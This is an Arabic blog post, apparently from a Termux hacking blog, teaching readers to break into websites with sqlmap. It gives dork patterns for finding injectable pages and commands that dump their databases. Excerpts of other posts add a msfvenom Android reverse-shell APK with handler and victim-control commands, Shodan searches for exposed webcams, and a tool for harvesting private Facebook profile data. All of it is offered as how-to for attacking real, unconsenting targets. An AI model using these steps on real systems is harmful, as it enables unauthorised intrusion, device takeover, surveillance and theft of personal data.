التخطي إلى المحتوى الرئيسي

إختراق المواقع المصابة بالثغرة بأداة sqlmap


السلام عليكم في هذا الشرح سوف نقدم لكم طريقة تثبيت أداة sqlmap لإختراق المواقع المصابة بالثغرة sql
للتثبيت أدخل الأوامر التالية
$apt update
$apt upgrade
$apt install git
$git clone https://github.com/sqlmapproject/sqlmap
*والأن ننتظر حتى يتم تثبيت الأداة
-طريقة تشغيل الأداة
لتشغيل الأداة ندخل الأوامر التالية
$cd sqlmap
$ls
$chmod +x sqlmap.py
$python2 sqlmap.py
*والأن مبروك إشتغلت الأداة
-طريقة العمل عليها
والٱن بعد تشغيل الأداة
والٱن نحتاج إلى دوركات أي نهايات
للحصول على مواقع مصابة بالثغرة نذهب إلى المتصفح وندخل إحدى الدوركات التالية
page.php?id=
trainers.php?id=
article.php?ID=
games.php?id=
newsDetail.php?id=
staff.php?id=
products.php?id=
news_view.php?id=
opinions.php?id=
pages.php?id=
ستظهر لنا المواقع المصابة بالثغرة وللتأكد من أنها مصابة بالثغرة نذهب إلى نهاية عنوان الموقع وضع (') هذه النقطة إذا ضهرت لك خطأ أو شيء ٱخر فإن هذا الموقع مصاب بالثغرة
والٱن طريقة إختراقه
نقوم بنسخ الموقع الذي نريد إختراقه
وندخل الأوامر التالية
الأمر الأول
python2 sqlmap.py -u name web --dbs s-- level=3 --risk=3 --batch
الأمر الثاني
python2 sqlmap.py -u name web -D (name_database) --tables --level=3 --risk=3 --batch
الأمر الثالث
python2 sqlmap.py -u name web -D (NAME_database) -T (name_table) --columns --level=3 --risk=3 --batch
الأمر الرابع والأخير
python2 sqlmap.py -u name web -D (NAME_database) -T (NAME_table) -C (NAME_column) --dump --level=3 --risk=3 --batch
ملاحظة هامة مكان name web نضع رابط الموقع الذي نريد إختراقه
ومكان (name_database) عنوان الذي سيضهر لنا بعد إدخال الأمر الأول
وشكرااا😘😘😘😘😘
لمن يواجه مشكلة فاليترك تعليق سيتم الرد بسرعة

تعليقات

المشاركات الشائعة من هذه المدونة

⚶ عمل باليود ملغم بالميتاسبلويت اولا عمل بايلود تطبيق apk ملغم msfvenom -p android/meterpreter/reverse_tcp LHOST=10.116.201.160 LPORT=4444 R > /sdcard/termux.apk ----------------------------------------------------------------- ثانيا امر فتح اداه MetaSploit ./msfconsole ----------------------------------------------------------------- ثالثا بعد الدخول علي اداه MetaSploit $ use exploit/multi/handler $ set payload android/meterpreter/reverse_tcp $ set lhost 10.118.171.194 $ set lport 4444 $ exploit $ help $ shell $ cd /sdcard $ ls ----------------------------------------------------------------- رابعا اوامر التحكم في الضحيه لأعادة تشغيل جهاز الضحية : reboot ------------------------------------------------------------ لاطفاء جهاز الضحية : shutdown ------------------------------------------------------------ لاضهار معلومات حول نضام الضحية مثل نضام تشغيل و لغة : sysinfo ------------------------------------------------------------ لألتقاط صورة من شاشة الضحية : screenshot ---------...

اوامر اختراق كاميرات المراقبة من termux

pkg install python easy_install shodan pip install shodan requests http://www.shodan.io .  رابط الموقع حتى تجيب منه الكود shodan init (الكود الذي حصلت عليه من الموقع) shodan -h  لإظهار معلومات الأداة shodan  search webcamxp امر البحث عن الكاميرات

اداة FBI لجمع معلومات اي حساب في فيسبوك

هو جمع معلومات اي حساب فيسبوك دقيق ، يمكن جمع جميع المعلومات الحساسة بسهولة على الرغم من أن الهدف يحول جميع خصوصياته إلى (أنا فقط) ، معلومات حساسة عن الإقامة وتاريخ الميلاد والمهنة ورقم الهاتف وعنوان البريد الإلكتروني. $ apt update && apt upgrade $ apt install git python2 $ git clone https://github.com/xHak9x/fbi.git $ cd fbi $ pip2 install -r requirements.txt $ python2 fbi.py